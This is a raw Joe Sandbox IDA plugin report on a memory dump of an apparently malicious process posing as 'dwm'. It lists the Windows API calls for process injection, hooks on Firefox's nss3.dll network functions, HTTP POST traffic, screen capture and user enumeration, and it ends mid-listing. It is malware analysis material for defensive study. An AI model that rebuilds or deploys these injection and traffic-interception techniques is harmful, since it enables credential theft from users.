GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00642F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00642F50

Part of subcall function 006497D0: VirtualProtect.KERNEL32(0064CA1A,?,00000040,00000000,006A0014,?,?,00642F6C,?,?), ref: 006497E5
Part of subcall function 006497D0: VirtualProtect.KERNEL32(0064CA1A,?,00000000,00000000,?,?,00642F6C,?,?), ref: 00649818

CreateEventW.KERNEL32(00652C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00642FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00642FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00642FF7
CloseHandle.KERNEL32(0000000C), ref: 0064300D
CloseHandle.KERNEL32(?), ref: 00643013
CloseHandle.KERNEL32(?), ref: 00643016

Part of subcall function 00646B8E: ReleaseMutex.KERNEL32(00000000,00643021,?,?,?), ref: 00646B92

Part of subcall function 0064D0E6: LoadLibraryW.KERNEL32(?), ref: 0064D107
Part of subcall function 0064D0E6: GetProcAddress.KERNEL32(00000000,?), ref: 0064D128
Part of subcall function 0064D0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0064D159
Part of subcall function 0064D0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0064D17C
Part of subcall function 0064D0E6: FreeLibrary.KERNEL32(00000000), ref: 0064D1A3
Part of subcall function 0064D0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0064D1D9
Part of subcall function 0064D0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0064D212
Part of subcall function 0064D0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 0064D2AB
Part of subcall function 0064D0E6: NetApiBufferFree.NETAPI32(?), ref: 0064D2BE
Part of subcall function 0064D0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0064D2E2

Part of subcall function 00644E20: CharToOemW.USER32(?,?), ref: 00644E35

Part of subcall function 00646B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00642E87,?,19367401,?,00000001,8889347B,00000002), ref: 00646BA9
Part of subcall function 00646B9E: CloseHandle.KERNEL32(00000000), ref: 00646BB4

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 00642507: CreateMutexW.KERNELBASE(00652C30,00000000,?,?,?,?,?), ref: 00642528

Part of subcall function 0064CCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,00D8F800,00000000), ref: 0064CD57
Part of subcall function 0064CCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0064CD6F

Strings

{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 00642F08
C:\Users\admin\AppData\Roaming, xrefs: 00642F35, 00642F6C, 00642F94
, xrefs: 00642DD7

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063DD09, Relevance: 25.7, APIs: 17, Instructions: 205

APIs

TlsAlloc.KERNEL32(00652868,00000000,0000018C,00000000,00000000), ref: 0063DD22
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0063DD4A
CreateEventW.KERNEL32(00652C30,00000001,00000000,?,84889912,?,00000001), ref: 0063DD74
CreateMutexW.KERNEL32(00652C30,00000000,?,18782822,?,00000001), ref: 0063DD97
CreateFileMappingW.KERNEL32(00000000,00652C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0063DDC2
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0063DDD8
GetDC.USER32(00000000), ref: 0063DDF5
GetDeviceCaps.GDI32(00000000,00000008), ref: 0063DE15
GetDeviceCaps.GDI32(?,0000000A), ref: 0063DE1F
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0063DE32

Part of subcall function 00649959: GetDIBits.GDI32(00000000,0063DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00649991
Part of subcall function 00649959: GetDIBits.GDI32(00000000,0063DE4B,00000000,00000001,00000000,00000000,00000000), ref: 006499A7
Part of subcall function 00649959: DeleteObject.GDI32(0063DE4B), ref: 006499B4
Part of subcall function 00649959: CreateDIBSection.GDI32(00000000,00000000,00000000,00652888,?,?), ref: 00649A24
Part of subcall function 00649959: DeleteObject.GDI32(0063DE4B), ref: 00649A43

ReleaseDC.USER32(00000000,?), ref: 0063DE56

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

CreateMutexW.KERNEL32(00652C30,00000000,?,1898B122,?,00000001,006528B8,?,00000102,006528A4,00652E70,00000010,?,?), ref: 0063DF00
GetDC.USER32(00000000), ref: 0063DF15
CreateCompatibleDC.GDI32(00000000), ref: 0063DF23
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0063DF3A
SelectObject.GDI32(00000000,00000000), ref: 0063DF4D
ReleaseDC.USER32(00000000,00000001), ref: 0063DF65

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00641A04, Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 182

APIs

Part of subcall function 00647E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00647E48

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00641A36
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00641A57
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00641AA6
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00641AFD

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00641B75
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00641B98
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00641BC0

Part of subcall function 006454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00645505
Part of subcall function 006454F1: GetLastError.KERNEL32 ref: 0064550F
Part of subcall function 006454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0064552F

InternetCloseHandle.WININET(00000000), ref: 00641C05
InternetCloseHandle.WININET(?), ref: 00641C0F
InternetCloseHandle.WININET(?), ref: 00641C19

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

POST, xrefs: 00641A6F
GET, xrefs: 00641A76, 00641AA1
HTTP/1.1, xrefs: 00641A98
nj<jFj, xrefs: 00641BC0

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063E240, Relevance: 22.6, APIs: 15, Instructions: 132

APIs

GetMenu.USER32(?), ref: 0063E26A
GetMenuItemCount.USER32(00000000), ref: 0063E280
GetMenuState.USER32(00000000,00000000,00000400), ref: 0063E298
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0063E2A8
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0063E2CE
GetMenuState.USER32(00000000,00000000,00000400), ref: 0063E2E2
EndMenu.USER32 ref: 0063E2F2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0063E302
GetSubMenu.USER32(00000000,00000000), ref: 0063E326
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0063E340
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0063E361
GetMenuItemID.USER32(00000000,00000000), ref: 0063E379
SendMessageW.USER32(?,00000111,?,00000000), ref: 0063E392

Part of subcall function 006354A9: GetWindowInfo.USER32(?,?), ref: 00635515
Part of subcall function 006354A9: IntersectRect.USER32(?,?,-00000114), ref: 00635538
Part of subcall function 006354A9: IntersectRect.USER32(?,?,-00000114), ref: 0063558E
Part of subcall function 006354A9: GetDC.USER32(00000000), ref: 006355D2
Part of subcall function 006354A9: CreateCompatibleDC.GDI32(00000000), ref: 006355E3
Part of subcall function 006354A9: ReleaseDC.USER32(00000000,00000000), ref: 006355ED
Part of subcall function 006354A9: SelectObject.GDI32(00000000,?), ref: 00635602
Part of subcall function 006354A9: DeleteDC.GDI32(00000000), ref: 00635610
Part of subcall function 006354A9: TlsSetValue.KERNEL32(?), ref: 0063565B
Part of subcall function 006354A9: EqualRect.USER32(?,?), ref: 00635675
Part of subcall function 006354A9: SaveDC.GDI32(00000000), ref: 00635680
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0063569B
Part of subcall function 006354A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 006356BB
Part of subcall function 006354A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 006356CD
Part of subcall function 006354A9: RestoreDC.GDI32(00000000,?), ref: 006356E4
Part of subcall function 006354A9: SaveDC.GDI32(00000000), ref: 00635706
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0063571C
Part of subcall function 006354A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00635735
Part of subcall function 006354A9: RestoreDC.GDI32(00000000,?), ref: 00635743
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00635756
Part of subcall function 006354A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00635766
Part of subcall function 006354A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00635778
Part of subcall function 006354A9: TlsSetValue.KERNEL32(00000000), ref: 00635792
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 006357B2
Part of subcall function 006354A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 006357CE
Part of subcall function 006354A9: SelectObject.GDI32(00000000,?), ref: 006357E4
Part of subcall function 006354A9: DeleteDC.GDI32(00000000), ref: 006357EB
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00635813
Part of subcall function 006354A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00635829

SetKeyboardState.USER32 ref: 0063E3D1
SetEvent.KERNEL32 ref: 0063E3DD

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006470A1, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52

APIs

LoadLibraryA.KERNEL32(cabinet.dll), ref: 006470B5
GetProcAddress.KERNEL32(00000000,FCICreate,?,?,006473A4,?,?,00000000,?), ref: 006470D5
GetProcAddress.KERNEL32(FCIAddFile,?,006473A4,?,?,00000000,?), ref: 006470E7
GetProcAddress.KERNEL32(FCIFlushCabinet,?,006473A4,?,?,00000000,?), ref: 006470F9
GetProcAddress.KERNEL32(FCIDestroy,?,006473A4,?,?,00000000,?), ref: 0064710B
HeapCreate.KERNEL32(00000000,00080000,00000000,006473A4,?,?,00000000,?), ref: 00647136
FreeLibrary.KERNEL32(006473A4,?,?,00000000,?), ref: 0064714B

Strings

cabinet.dll, xrefs: 006470B0
FCIDestroy, xrefs: 006470FB
FCICreate, xrefs: 006470CF
FCIAddFile, xrefs: 006470D7
FCIFlushCabinet, xrefs: 006470E9

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006350A7, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 194

APIs

EnterCriticalSection.KERNEL32(006523AC,0000FDE9,?), ref: 0063515C

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

LeaveCriticalSection.KERNEL32(006523AC,?,000000FF), ref: 006351B7
EnterCriticalSection.KERNEL32(006523AC), ref: 006351D2
getpeername.WS2_32 ref: 0063527F

Part of subcall function 0064681C: WSAAddressToStringW.WS2_32(?,-0000001D,00000000,?,?), ref: 00646840

Strings

EASV, xrefs: 00635250
Z\AV, xrefs: 00635248
OMAV, xrefs: 00635232
]QPG, xrefs: 0063522A
\[EP, xrefs: 006350E8
YIST, xrefs: 0063523A
YISQ, xrefs: 006350EF

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064D0E6, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188

APIs

LoadLibraryW.KERNEL32(?), ref: 0064D107
GetProcAddress.KERNEL32(00000000,?), ref: 0064D128
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0064D159
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0064D17C
FreeLibrary.KERNEL32(00000000), ref: 0064D1A3
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0064D1D9
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0064D212

Part of subcall function 00637125: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00637138
Part of subcall function 00637125: PathUnquoteSpacesW.SHLWAPI(?), ref: 006371A0
Part of subcall function 00637125: ExpandEnvironmentStringsW.KERNEL32(?,0064D23A,00000104), ref: 006371AD
Part of subcall function 00637125: LocalFree.KERNEL32(?,.exe,00000000), ref: 006371C0

NetApiBufferFree.NETAPI32(?,?,?), ref: 0064D2AB

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

Part of subcall function 006489C2: PathSkipRootW.SHLWAPI(?), ref: 006489CD
Part of subcall function 006489C2: GetFileAttributesW.KERNEL32(?,?,00000000,0064D261,?,?,?,?,?), ref: 006489F5
Part of subcall function 006489C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0064D261,?,?,?,?,?), ref: 00648A03

Part of subcall function 0064C912: LoadLibraryW.KERNEL32(?), ref: 0064C929
Part of subcall function 0064C912: GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0064D2A8), ref: 0064C955
Part of subcall function 0064C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0064D2A8,?,?), ref: 0064C96C
Part of subcall function 0064C912: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0064D2A8,?,?), ref: 0064C984
Part of subcall function 0064C912: WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0064D2A8,?,?,00000000), ref: 0064C9A1
Part of subcall function 0064C912: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0064D2A8,?,?,00000000), ref: 0064CA0D

NetApiBufferFree.NETAPI32(?), ref: 0064D2BE
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0064D2E2

Part of subcall function 0064786B: PathAddExtensionW.SHLWAPI(?,00000000), ref: 006478AC
Part of subcall function 0064786B: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 006478B9

Strings

.exe, xrefs: 0064D1BB, 0064D267, 0064D2EE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064C095, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254

APIs

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

EnterCriticalSection.KERNEL32(00653FE4), ref: 0064C0BC
LeaveCriticalSection.KERNEL32(00653FE4), ref: 0064C11A

Part of subcall function 00641049: EnterCriticalSection.KERNEL32(00652AC8), ref: 00641064
Part of subcall function 00641049: LeaveCriticalSection.KERNEL32(00652AC8), ref: 006410E7
Part of subcall function 00641049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 006411B2
Part of subcall function 00641049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 006413EC

LeaveCriticalSection.KERNEL32(00653FE4), ref: 0064C161

Part of subcall function 0064835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 006483B8

Part of subcall function 006482E2: StrCmpNIA.SHLWAPI(?,?,?), ref: 0064831F

LeaveCriticalSection.KERNEL32(00653FE4), ref: 0064C2CC
EnterCriticalSection.KERNEL32(00653FE4), ref: 0064C2EB
LeaveCriticalSection.KERNEL32(00653FE4), ref: 0064C34D

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

LeaveCriticalSection.KERNEL32(00653FE4), ref: 0064C376
EnterCriticalSection.KERNEL32(00653FE4), ref: 0064C395
LeaveCriticalSection.KERNEL32(00653FE4), ref: 0064C3DD

Strings

If-Modified-Since, xrefs: 0064C20F
Accept-Encoding, xrefs: 0064C1EB
identity, xrefs: 0064C1DF

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00643048, Relevance: 18.1, APIs: 12, Instructions: 138

APIs

Part of subcall function 006420C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00642105
Part of subcall function 006420C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00642172
Part of subcall function 006420C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 006421A7
Part of subcall function 006420C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 006421DB
Part of subcall function 006420C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 006421FA
Part of subcall function 006420C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0064220C
Part of subcall function 006420C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0064221E
Part of subcall function 006420C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00642230
Part of subcall function 006420C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00642242
Part of subcall function 006420C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00642254
Part of subcall function 006420C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0064228D
Part of subcall function 006420C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 0064229C
Part of subcall function 006420C4: InitializeCriticalSection.KERNEL32(0065400C,?,?,00000000), ref: 006422C9
Part of subcall function 006420C4: WSAStartup.WS2_32(00000202,?), ref: 006422DF
Part of subcall function 006420C4: CreateEventW.KERNEL32(00652C30,00000001,00000000,00000000,?,?,00000000), ref: 00642300
Part of subcall function 006420C4: GetLengthSid.ADVAPI32(00000000,000000FF,00652C08,?,?,00000000), ref: 00642335
Part of subcall function 006420C4: GetCurrentProcessId.KERNEL32(00000000,00D8F7D0,00000000,?,?,00000000), ref: 00642362

SetErrorMode.KERNEL32(00008007,00000000), ref: 0064306F
GetCommandLineW.KERNEL32(?), ref: 00643079
CommandLineToArgvW.SHELL32(00000000), ref: 00643080
LocalFree.KERNEL32(00000000), ref: 006430D5

Part of subcall function 0063E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0063E108
Part of subcall function 0063E0FB: GetThreadDesktop.USER32(00000000), ref: 0063E10F
Part of subcall function 0063E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0063E128

Part of subcall function 00635BF6: GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,006430F6), ref: 00635C03
Part of subcall function 00635BF6: SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,006430F6), ref: 00635C0A
Part of subcall function 00635BF6: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,006430F6), ref: 00635C1C
Part of subcall function 00635BF6: SetEvent.KERNEL32(00652868,?,00000001), ref: 00635C69
Part of subcall function 00635BF6: GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00635C76

Part of subcall function 0063DF74: DeleteObject.GDI32(00000000), ref: 0063DF87
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063DF97
Part of subcall function 0063DF74: TlsFree.KERNEL32(00000000,00000000,00652868,00000000,0063E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0063DFA2
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063DFB0
Part of subcall function 0063DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00652868,00000000,0063E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0063DFBA
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063DFC7
Part of subcall function 0063DF74: SelectObject.GDI32(00000000,00000000), ref: 0063DFE1
Part of subcall function 0063DF74: DeleteObject.GDI32(00000000), ref: 0063DFF2
Part of subcall function 0063DF74: DeleteDC.GDI32(00000000), ref: 0063DFFF
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063E010
Part of subcall function 0063DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0063E01F
Part of subcall function 0063DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0063E038

Part of subcall function 00642B08: GetModuleHandleW.KERNEL32(?), ref: 00642B1F
Part of subcall function 00642B08: GetProcAddress.KERNEL32(00000000,?), ref: 00642B41

Part of subcall function 00642D01: CreateMutexW.KERNEL32(00652C30,00000001,?,32901130,?,00000001,?), ref: 00642D91
Part of subcall function 00642D01: GetLastError.KERNEL32 ref: 00642DA3
Part of subcall function 00642D01: CloseHandle.KERNEL32(000001E6), ref: 00642DBA
Part of subcall function 00642D01: ExitWindowsEx.USER32(00000014,80000000), ref: 00642DFD
Part of subcall function 00642D01: OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00642E1C
Part of subcall function 00642D01: SetEvent.KERNEL32(00000000), ref: 00642E29
Part of subcall function 00642D01: CloseHandle.KERNEL32(00000000), ref: 00642E30
Part of subcall function 00642D01: CloseHandle.KERNEL32(000001E6), ref: 00642E42
Part of subcall function 00642D01: ReadProcessMemory.KERNEL32(000000FF,006A0014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00642EA6
Part of subcall function 00642D01: Sleep.KERNEL32(000001F4), ref: 00642EB8
Part of subcall function 00642D01: IsWellKnownSid.ADVAPI32(00D8F7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00642EC9
Part of subcall function 00642D01: ReadProcessMemory.KERNEL32(000000FF,006A0014,00000000,00000001,00000000), ref: 00642EF1
Part of subcall function 00642D01: GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00642F0D
Part of subcall function 00642D01: VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00642F50
Part of subcall function 00642D01: CreateEventW.KERNEL32(00652C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00642FCE
Part of subcall function 00642D01: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00642FE7
Part of subcall function 00642D01: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00642FF7
Part of subcall function 00642D01: CloseHandle.KERNEL32(0000000C), ref: 0064300D
Part of subcall function 00642D01: CloseHandle.KERNEL32(?), ref: 00643013
Part of subcall function 00642D01: CloseHandle.KERNEL32(?), ref: 00643016

Sleep.KERNEL32(000000FF,?,00000001), ref: 0064312B
ExitProcess.KERNEL32(00000000,00000000), ref: 0064313C
OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00643157

Part of subcall function 00642542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00642574
Part of subcall function 00642542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0064316D,?,00000000,?,?,00000000), ref: 006425AB
Part of subcall function 00642542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0064316D,?,00000000,?,?,00000000), ref: 006425CB
Part of subcall function 00642542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0064316D,?,00000000), ref: 0064261A

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00C95903,00000000,00000000,00000000), ref: 00643185
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00643198
CloseHandle.KERNEL32(?), ref: 006431A1
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 006431B5
CloseHandle.KERNEL32(00000000), ref: 006431BC

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063DF74, Relevance: 18.1, APIs: 12, Instructions: 78

APIs

DeleteObject.GDI32(00000000), ref: 0063DF87
CloseHandle.KERNEL32(00000000), ref: 0063DF97
TlsFree.KERNEL32(00000000,00000000,00652868,00000000,0063E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0063DFA2
CloseHandle.KERNEL32(00000000), ref: 0063DFB0
UnmapViewOfFile.KERNEL32(00000000,00000000,00652868,00000000,0063E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0063DFBA
CloseHandle.KERNEL32(00000000), ref: 0063DFC7
SelectObject.GDI32(00000000,00000000), ref: 0063DFE1
DeleteObject.GDI32(00000000), ref: 0063DFF2
DeleteDC.GDI32(00000000), ref: 0063DFFF
CloseHandle.KERNEL32(00000000), ref: 0063E010
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0063E01F
PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0063E038

Part of subcall function 00644DCA: CloseHandle.KERNEL32(00000000), ref: 00644DD9
Part of subcall function 00644DCA: CloseHandle.KERNEL32(00000000), ref: 00644DE2

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00644CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00644CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00644D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00644D19
CreateProcessAsUserW.ADVAPI32(?,00000000,0064C8F5,00000000,00000000,00000000,0064C8F5,0064C8F5,00000000,?,?,?,00000000,00000044), ref: 00644D8A
CloseHandle.KERNEL32(?), ref: 00644D9D
CloseHandle.KERNEL32(?), ref: 00644DA2
FreeLibrary.KERNEL32(?), ref: 00644DB9

Strings

userenv.dll, xrefs: 00644CE6
CreateEnvironmentBlock, xrefs: 00644D07
DestroyEnvironmentBlock, xrefs: 00644D0F

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063C103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,006420A9), ref: 0063C111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,006420A9), ref: 0063C125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0063C132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0063C13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0063C14C

Part of subcall function 0063BE3B: VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0063C160,00652360), ref: 0063BE72

Part of subcall function 0064B58C: InitializeCriticalSection.KERNEL32(00653FE4,76C61857,0063C185,00652360), ref: 0064B5A2
Part of subcall function 0064B58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0064B5DE
Part of subcall function 0064B58C: GetProcAddress.KERNEL32(PR_SetError), ref: 0064B5F0
Part of subcall function 0064B58C: GetProcAddress.KERNEL32(PR_GetError), ref: 0064B602

Strings

PR_Close, xrefs: 0063C127
nss3.dll, xrefs: 0063C10C
PR_Read, xrefs: 0063C134
PR_OpenTCPSocket, xrefs: 0063C11F
PR_Write, xrefs: 0063C141

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00635C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 0063DCA2: GetClassNameW.USER32(006A01CA,?,00000101), ref: 0063DCBD

